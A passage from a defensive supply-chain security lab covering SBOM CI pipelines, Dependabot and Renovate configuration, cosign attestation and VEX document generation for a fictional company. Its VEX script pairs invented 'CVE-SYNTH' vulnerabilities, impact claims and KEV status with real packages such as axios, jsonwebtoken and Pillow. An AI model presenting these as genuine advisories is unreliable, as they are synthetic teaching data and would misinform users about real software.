          #   -d @sbom-${{ matrix.app }}-cdx.json
          echo "SBOM published successfully (simulated)"

  # ── Stage 5: Generate VEX Document ──
  generate-vex:
    needs: vulnerability-scan
    runs-on: ubuntu-latest
    if: github.ref == 'refs/heads/main'
    steps:
      - uses: actions/checkout@v4

      - name: Download All Vulnerability Reports
        uses: actions/download-artifact@v4
        with:
          pattern: vuln-*
          merge-multiple: true

      - name: Generate VEX Document
        run: |
          python scripts/generate_vex.py \
            --vulns vuln-report-*.json \
            --output vex-document.json

      - name: Upload VEX Document
        uses: actions/upload-artifact@v4
        with:
          name: vex-document
          path: vex-document.json
PIPELINE

6.2 — CI/CD Pipeline Architecture¶

flowchart TB
    subgraph "Trigger"
        A[Git Push / PR / Schedule]
    end

    subgraph "Stage 1: SBOM Generation"
        B1[Syft Scan<br/>npm app]
        B2[Syft Scan<br/>pip app]
        B3[Syft Scan<br/>Maven app]
        B1 --> C1[CycloneDX JSON]
        B1 --> C2[SPDX JSON]
        B2 --> C3[CycloneDX JSON]
        B2 --> C4[SPDX JSON]
        B3 --> C5[CycloneDX JSON]
        B3 --> C6[SPDX JSON]
    end

    subgraph "Stage 2: Vulnerability Scan"
        D1[Grype Scan] --> E1[Vuln Report JSON]
        D1 --> E2[SARIF Upload]
        E2 --> F1[GitHub Security Tab]
    end

    subgraph "Stage 3: License Check"
        G1[License Audit] --> H1{Prohibited?}
        H1 -->|Yes| I1[FAIL Pipeline]
        H1 -->|No| I2[PASS]
    end

    subgraph "Stage 4: Attestation"
        J1[cosign attest-blob] --> K1[Sigstore Bundle]
        K1 --> L1[SBOM Server]
    end

    subgraph "Stage 5: VEX"
        M1[Generate VEX] --> N1[VEX Document]
    end

    A --> B1 & B2 & B3
    C1 & C3 & C5 --> D1
    C1 & C3 & C5 --> G1
    D1 & I2 --> J1
    E1 --> M1

    style I1 fill:#d32f2f,color:#fff
    style I2 fill:#388e3c,color:#fff
    style K1 fill:#1565c0,color:#fff
    style F1 fill:#7b1fa2,color:#fff

6.3 — Dependabot Configuration¶

cat > ~/lab31-sbom/ci/dependabot.yml << 'DEPENDABOT'
# .github/dependabot.yml
# Automated dependency update configuration
# Meridian Software Corp — internal.example.com

version: 2

registries:
  npm-internal:
    type: npm-registry
    url: https://nexus.internal.example.com/npm/
    token: ${{ secrets.NEXUS_TOKEN }}
  pypi-internal:
    type: python-index
    url: https://nexus.internal.example.com/pypi/simple/
    username: testuser
    password: ${{ secrets.NEXUS_PASSWORD }}

updates:
  # npm dependencies
  - package-ecosystem: "npm"
    directory: "/apps/meridian-web-portal"
    schedule:
      interval: "weekly"
      day: "monday"
      time: "06:00"
      timezone: "America/New_York"
    open-pull-requests-limit: 10
    reviewers:
      - "security-team"
    labels:
      - "dependencies"
      - "security"
      - "auto-update"
    commit-message:
      prefix: "deps(npm)"
    registries:
      - npm-internal
    groups:
      production-deps:
        patterns:
          - "*"
        exclude-patterns:
          - "@types/*"
          - "eslint*"
          - "jest*"
          - "typescript"
        update-types:
          - "minor"
          - "patch"
      dev-deps:
        patterns:
          - "@types/*"
          - "eslint*"
          - "jest*"
          - "typescript"
    ignore:
      # Ignore major version updates without manual review
      - dependency-name: "*"
        update-types: ["version-update:semver-major"]

  # pip dependencies
  - package-ecosystem: "pip"
    directory: "/apps/meridian-data-pipeline"
    schedule:
      interval: "weekly"
      day: "monday"
      time: "06:00"
    open-pull-requests-limit: 10
    reviewers:
      - "security-team"
    labels:
      - "dependencies"
      - "security"
      - "auto-update"
    commit-message:
      prefix: "deps(pip)"
    registries:
      - pypi-internal

  # Maven dependencies
  - package-ecosystem: "maven"
    directory: "/apps/meridian-api-gateway"
    schedule:
      interval: "weekly"
      day: "monday"
      time: "06:00"
    open-pull-requests-limit: 10
    reviewers:
      - "security-team"
    labels:
      - "dependencies"
      - "security"
      - "auto-update"
    commit-message:
      prefix: "deps(maven)"

  # GitHub Actions
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
    labels:
      - "ci"
      - "dependencies"
DEPENDABOT

6.4 — Renovate Configuration (Alternative to Dependabot)¶

cat > ~/lab31-sbom/ci/renovate.json << 'RENOVATE'
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "description": "Renovate configuration for Meridian Software Corp",
  "extends": [
    "config:recommended",
    "security:openssf-scorecard",
    ":dependencyDashboard",
    ":semanticCommits"
  ],
  "registryAliases": {
    "npm-internal": "https://nexus.internal.example.com/npm/",
    "pypi-internal": "https://nexus.internal.example.com/pypi/simple/"
  },
  "timezone": "America/New_York",
  "schedule": ["before 8am on Monday"],
  "prHourlyLimit": 5,
  "prConcurrentLimit": 15,
  "labels": ["dependencies", "security", "auto-update"],
  "reviewers": ["security-team"],
  "vulnerabilityAlerts": {
    "enabled": true,
    "labels": ["security-alert"],
    "schedule": ["at any time"]
  },
  "packageRules": [
    {
      "description": "Auto-merge patch updates for production deps",
      "matchUpdateTypes": ["patch"],
      "matchDepTypes": ["dependencies"],
      "automerge": true,
      "automergeType": "pr",
      "automergeStrategy": "squash",
      "platformAutomerge": true
    },
    {
      "description": "Group all dev dependency updates",
      "matchDepTypes": ["devDependencies"],
      "groupName": "dev dependencies",
      "automerge": true
    },
    {
      "description": "Block major updates — require manual review",
      "matchUpdateTypes": ["major"],
      "automerge": false,
      "labels": ["major-update", "manual-review"]
    },
    {
      "description": "Security updates — immediate, bypass normal schedule",
      "matchCategories": ["security"],
      "schedule": ["at any time"],
      "automerge": true,
      "prPriority": 10
    }
  ],
  "customManagers": [
    {
      "customType": "regex",
      "fileMatch": ["Dockerfile$"],
      "matchStrings": [
        "FROM\\s+(?<depName>[^:]+):(?<currentValue>[^\\s@]+)(?:@(?<currentDigest>sha256:[a-f0-9]+))?"
      ],
      "datasourceTemplate": "docker"
    }
  ]
}
RENOVATE

6.5 — SBOM Attestation with Sigstore cosign¶

Why Attestation Matters

SBOM attestation cryptographically binds an SBOM to the build that produced it. Without attestation, an SBOM is just a JSON file — anyone could have created it. With Sigstore cosign, you get:

Keyless signing — no key management overhead (uses OIDC identity)
Transparency log — all attestations are recorded in Rekor for auditability
Tamper detection — any modification to the SBOM invalidates the signature
Supply chain provenance — proves WHO built WHAT, WHEN, and FROM which source

# ── Sign an SBOM with cosign (keyless, using Sigstore) ──
cosign attest-blob \
  --predicate sboms/web-portal-syft-cdx.json \
  --type cyclonedx \
  --bundle attestations/web-portal-attestation.json \
  --yes

# ── Verify the attestation ──
cosign verify-blob-attestation \
  --bundle attestations/web-portal-attestation.json \
  --certificate-identity "testuser@internal.example.com" \
  --certificate-oidc-issuer "https://auth.internal.example.com" \
  --type cyclonedx \
  sboms/web-portal-syft-cdx.json

Expected output:

Verified OK

6.6 — VEX Document Creation¶

VEX (Vulnerability Exploitability eXchange) documents communicate the actual exploitability status of vulnerabilities in the context of a specific product.

cat > ~/lab31-sbom/scripts/generate_vex.py << 'VEX_GEN'
#!/usr/bin/env python3
"""
VEX Document Generator — Creates Vulnerability Exploitability eXchange documents
in OpenVEX format to communicate vulnerability status to consumers.
Lab 31: SBOM Analysis & Supply Chain Security
"""

import json
import sys
from datetime import datetime, timezone


def generate_vex_document(app_name: str, vulns: list[dict]) -> dict:
    """Generate an OpenVEX document for a set of vulnerabilities."""
    vex = {
        "@context": "https://openvex.dev/ns/v0.2.0",
        "@id": f"https://sbom-server.internal.example.com/vex/{app_name}/2026-04-12",
        "author": "Meridian Security Engineering <security@internal.example.com>",
        "role": "Document Creator",
        "timestamp": "2026-04-12T10:00:00Z",
        "version": 1,
        "tooling": "Lab 31 VEX Generator v1.0",
        "statements": [],
    }

    # ── Define VEX status for each vulnerability ──
    vex_assessments = {
        "CVE-SYNTH-2026-1001": {
            "status": "affected",
            "justification": None,
            "action_statement": "Update axios to version 1.6.1 or later. The SSRF vulnerability is exploitable in our configuration because the web portal makes proxy-configured HTTP requests based on user input.",
            "impact_statement": "An attacker could redirect internal HTTP requests to access services on 10.50.0.0/16 network."
        },
        "CVE-SYNTH-2026-1002": {
            "status": "affected",
            "justification": None,
            "action_statement": "URGENT: Update jsonwebtoken to 9.0.1 immediately. Our authentication middleware does not explicitly set the 'algorithms' option, making it vulnerable to algorithm confusion. This is listed in CISA KEV.",
            "impact_statement": "Authentication bypass allows unauthenticated access to all API endpoints."
        },
        "CVE-SYNTH-2026-1003": {
            "status": "not_affected",
            "justification": "vulnerable_code_not_in_execute_path",
            "action_statement": "No action required. Our code does not use lodash merge/mergeWith/defaultsDeep functions. Verified by static analysis scan on 2026-04-10.",
            "impact_statement": None,
        },
        "CVE-SYNTH-2026-1004": {
            "status": "not_affected",
            "justification": "vulnerable_code_cannot_be_controlled_by_adversary",
            "action_statement": "No immediate action required. Moment locale loading is hardcoded to 'en-US' and does not accept user input. Schedule update to 2.30.1 in next maintenance window.",
            "impact_statement": None,
        },
        "CVE-SYNTH-2026-1005": {
            "status": "affected",
            "justification": None,
            "action_statement": "Update semver to 7.5.5. While ReDoS requires crafted input, the version range parser processes user-supplied version constraints in the plugin system.",
            "impact_statement": "Denial of service via crafted version range strings in plugin manifest."
        },
        "CVE-SYNTH-2026-1006": {
            "status": "under_investigation",
            "justification": None,
            "action_statement": "Security team is analyzing whether the open redirect in express is reachable through our route configuration. Expected completion: 2026-04-15.",
            "impact_statement": None,
        },
        "CVE-SYNTH-2026-2001": {
            "status": "affected",
            "justification": None,
            "action_statement": "CRITICAL: Update cryptography to 41.0.7 immediately. The data pipeline uses RSA OAEP for encrypting data at rest. This vulnerability is in CISA KEV with active exploitation.",
            "impact_statement": "Remote code execution via crafted ciphertext in data ingestion pipeline."
        },
        "CVE-SYNTH-2026-2002": {
            "status": "affected",
            "justification": None,
            "action_statement": "Update Pillow to 10.2.0. The data pipeline processes user-uploaded TIFF images in the document processing module.",
            "impact_statement": "Remote code execution via crafted TIFF image upload."
        },
        "CVE-SYNTH-2026-2003": {
            "status": "not_affected",
            "justification": "vulnerable_code_not_in_execute_path",
            "action_statement": "No action required. Jinja2 is used only for internal report generation with hardcoded templates. User input is never passed to the template engine.",
            "impact_statement": None,
        },
        "CVE-SYNTH-2026-2004": {
            "status": "affected",
            "justification": None,
            "action_statement": "Update paramiko to 3.4.0. The data pipeline uses SFTP for file transfer with external partners. Host key validation configuration needs review.",
            "impact_statement": "Man-in-the-middle attack on SFTP file transfers with partner systems."
        },
        "CVE-SYNTH-2026-3001": {
            "status": "not_affected",
            "justification": "vulnerable_code_cannot_be_controlled_by_adversary",
            "action_statement": "No immediate action required. Our Log4j2 pattern layouts do not include ThreadContext map data. Schedule update to 2.23.0 in next quarterly patch cycle.",
            "impact_statement": None,
        },
        "CVE-SYNTH-2026-3002": {
            "status": "affected",
            "justification": None,
            "action_statement": "Update jackson-databind to 2.16.1. The API gateway deserializes JSON payloads from external clients. While default typing is not globally enabled, review custom ObjectMapper configurations.",
            "impact_statement": "Potential remote code execution via crafted JSON payload."
        },
    }

    for vuln_id, assessment in vex_assessments.items():
        statement = {
            "vulnerability": {
                "@id": f"https://nvd-mirror.internal.example.com/vuln/{vuln_id}",
                "name": vuln_id,
            },
            "products": [
                {
                    "@id": f"pkg:generic/{app_name}",
                }
            ],
            "status": assessment["status"],
        }

        if assessment["justification"]:
            statement["justification"] = assessment["justification"]
        if assessment["action_statement"]:
            statement["action_statement"] = assessment["action_statement"]
        if assessment["impact_statement"]:
            statement["impact_statement"] = assessment["impact_statement"]

        vex["statements"].append(statement)

    return vex


if __name__ == "__main__":
    vex_doc = generate_vex_document("meridian-platform", [])

    output_path = "reports/vex-document.json"
    with open(output_path, "w") as f:
        json.dump(vex_doc, f, indent=2)

    print(f"VEX document generated: {output_path}")
    print(f"Total statements: {len(vex_doc['statements'])}")

    # Summary
    status_counts = {}
    for stmt in vex_doc["statements"]:
        status = stmt["status"]
        status_counts[status] = status_counts.get(status, 0) + 1

    print(f"\nVEX Status Summary:")
    for status, count in sorted(status_counts.items()):
        print(f"  {status:<25} {count}")

    print(f"\nAffected vulnerabilities requiring action:")
    for stmt in vex_doc["statements"]:
        if stmt["status"] == "affected":
            vuln_id = stmt["vulnerability"]["name"]
            action = stmt.get("action_statement", "No action specified")
            print(f"  {vuln_id}: {action[:80]}...")
VEX_GEN
chmod +x ~/lab31-sbom/scripts/generate_vex.py

Run:

cd ~/lab31-sbom && mkdir -p reports && python3 scripts/generate_vex.py

Expected output:

VEX document generated: reports/vex-document.json
Total statements: 12

VEX Status Summary:
  affected                  7
  not_affected              4
  under_investigation       1

Affected vulnerabilities requiring action:
  CVE-SYNTH-2026-1001: Update axios to version 1.6.1 or later. The SSRF vulnerability is exploitab...
  CVE-SYNTH-2026-1002: URGENT: Update jsonwebtoken to 9.0.1 immediately. Our authentication middl...
  CVE-SYNTH-2026-1005: Update semver to 7.5.5. While ReDoS requires crafted input, the version ra...
  CVE-SYNTH-2026-2001: CRITICAL: Update cryptography to 41.0.7 immediately. The data pipeline use...
  CVE-SYNTH-2026-2002: Update Pillow to 10.2.0. The data pipeline processes user-uploaded TIFF ima...
  CVE-SYNTH-2026-2004: Update paramiko to 3.4.0. The data pipeline uses SFTP for file transfer wi...
  CVE-SYNTH-2026-3002: Update jackson-databind to 2.16.1. The API gateway deserializes JSON paylo...

Lab Review and Validation¶

Completion Checklist¶

Use this checklist to verify you have completed all lab phases:

Phase	Task	Status
1	Generated SBOMs with Syft for all 3 apps (SPDX + CycloneDX)	☐
1	Generated SBOMs with Trivy for all 3 apps	☐
1	Generated SBOMs with cdxgen for all 3 apps	☐
1	Compared SPDX 2.3 vs CycloneDX 1.5 structure differences	☐
1	Verified component counts across tools	☐
2	Parsed SBOMs with sbom_parser.py	☐
2	Built dependency graph with dependency_tree.py	☐
2	Analyzed cross-application dependency overlap	☐
2	Calculated dependency depth and breadth metrics	☐
3	Scanned SBOMs with Grype for vulnerabilities	☐
3	Queried synthetic OSV database for vulnerability details	☐
3	Built risk priority matrix with CVSS + EPSS + KEV + business context	☐
3	Identified P0-EMERGENCY items requiring immediate action	☐
4	Ran typosquatting detector against all SBOMs	☐
4	Ran dependency confusion detector	☐
4	Analyzed package metadata for anomalies	☐
5	Extracted and classified all licenses from SBOMs	☐
5	Identified copyleft vs permissive license distribution	☐
5	Generated compliance matrix against enterprise policy	☐
6	Created GitHub Actions SBOM pipeline	☐
6	Configured Dependabot for automated updates	☐
6	Created Renovate configuration (alternative)	☐
6	Performed SBOM attestation with cosign	☐
6	Generated VEX document with exploitability assessments	☐

Key Takeaways¶

What You Learned

SBOM generation is tool-dependent — different tools produce different results. Always validate and document your tooling choices.
Transitive dependencies are the real risk — direct dependencies are visible in manifests, but transitive dependencies hide deep in the supply chain.
CVSS alone is insufficient — combining EPSS exploitation probability, CISA KEV status, and business context produces dramatically better prioritization.
Supply chain attacks are multifaceted — typosquatting, dependency confusion, and maintainer compromise are all active threat vectors requiring distinct detection strategies.
License compliance is a security concern — copyleft license violations can force source code disclosure, which is itself a security risk.
Attestation closes the trust gap — without cryptographic attestation, SBOMs are unverifiable claims. Sigstore cosign provides keyless, auditable signing.
Automation is non-negotiable — manual SBOM analysis does not scale. CI/CD integration ensures every build is analyzed.

Answers to Common Questions¶

FAQ

Q: Which SBOM format should I use — SPDX or CycloneDX? A: Use CycloneDX for security-focused workflows (vulnerability tracking, VEX) and SPDX for license compliance. Many organizations generate both. Government contracts may require SPDX for ISO/IEC 5962 compliance.

Q: How often should SBOMs be regenerated? A: Generate a new SBOM for every build/release. Additionally, run weekly rescans against updated vulnerability databases (new CVEs are published daily).

Q: What is the difference between VEX and a vulnerability report? A: A vulnerability report lists all known vulnerabilities. A VEX document adds context — is this vulnerability actually exploitable in YOUR product? VEX statements reduce false positives by marking vulnerabilities as "not_affected" with justification.

Q: Should I include devDependencies in SBOMs? A: Yes, if they are present in the build environment. Compromised devDependencies (like eslint-scope in 2018) can execute malicious code during the build process, even if they are not shipped in production.

Challenge Extensions¶

Bonus Challenges

SBOM Diff: Write a script that compares two SBOMs of the same application (e.g., v3.8.1 vs v3.8.2) and reports added, removed, and updated components.
Reachability Analysis: Integrate with a call graph analysis tool to determine if vulnerable code paths are actually reachable from application entry points.
SBOM Enrichment: Write a script that enriches CycloneDX SBOMs with OpenSSF Scorecard data for each component.
Custom Policy Engine: Build a policy engine that evaluates SBOMs against custom rules (e.g., "no packages with fewer than 1000 weekly downloads", "no packages published in the last 7 days").
SBOM-to-Graph: Export SBOM dependency data to a Neo4j graph database and write Cypher queries for supply chain risk analysis.

Cross-References¶

Chapter 24 — Supply Chain Attacks — Attack techniques and defense strategies for software supply chain security
Chapter 54 — SBOM Operations — Enterprise SBOM lifecycle management, tooling comparisons, and maturity model
Chapter 55 — Threat Modeling Operations — Threat modeling for supply chain risks, including STRIDE analysis of package registries

Lab 31 of the Nexus SecOps Lab Series. All data is synthetic. For educational use only.

Lab 31: SBOM Analysis & Supply Chain Security¶

Overview¶

Scenario¶

Lab Setup¶

Prerequisites Installation¶

Create Lab Directory Structure¶

Create Sample Application Manifests¶

npm Application — meridian-web-portal¶

pip Application — meridian-data-pipeline¶

Maven Application — meridian-api-gateway¶

Phase 1: SBOM Generation¶

Objective¶

1.1 — Generate SBOMs with Syft¶

1.2 — Generate SBOMs with Trivy¶

1.3 — Generate SBOMs with cdxgen¶

1.4 — Compare SPDX 2.3 vs CycloneDX 1.5 Format Structures¶

1.5 — Verify SBOM Completeness¶

Phase 2: Dependency Analysis¶

Objective¶

2.1 — SBOM Parsing Script¶

2.2 — Build Dependency Tree with NetworkX¶

2.3 — Cross-Application Dependency Overlap¶

Phase 3: Vulnerability Correlation¶

Objective¶

3.1 — Scan SBOMs with Grype¶

3.2 — Query OSV API for Vulnerability Data¶

3.3 — Build Risk Priority Matrix¶

3.4 — Vulnerability Prioritization Decision Tree¶

Phase 4: Malicious Package Detection¶

Objective¶

4.1 — Typosquatting Detection¶

4.2 — Dependency Confusion Detection¶

4.3 — Package Metadata Anomaly Detection¶

Phase 5: License Compliance¶

Objective¶

5.1 — License Extraction and Classification¶

5.2 — License Conflict Detection¶

Phase 6: CI/CD Integration¶

Objective¶

6.1 — GitHub Actions SBOM Pipeline¶

6.2 — CI/CD Pipeline Architecture¶

6.3 — Dependabot Configuration¶

6.4 — Renovate Configuration (Alternative to Dependabot)¶

6.5 — SBOM Attestation with Sigstore cosign¶

6.6 — VEX Document Creation¶

Lab Review and Validation¶

Completion Checklist¶

Key Takeaways¶

Answers to Common Questions¶

Challenge Extensions¶

Cross-References¶

npm Application — `meridian-web-portal`¶

pip Application — `meridian-data-pipeline`¶

Maven Application — `meridian-api-gateway`¶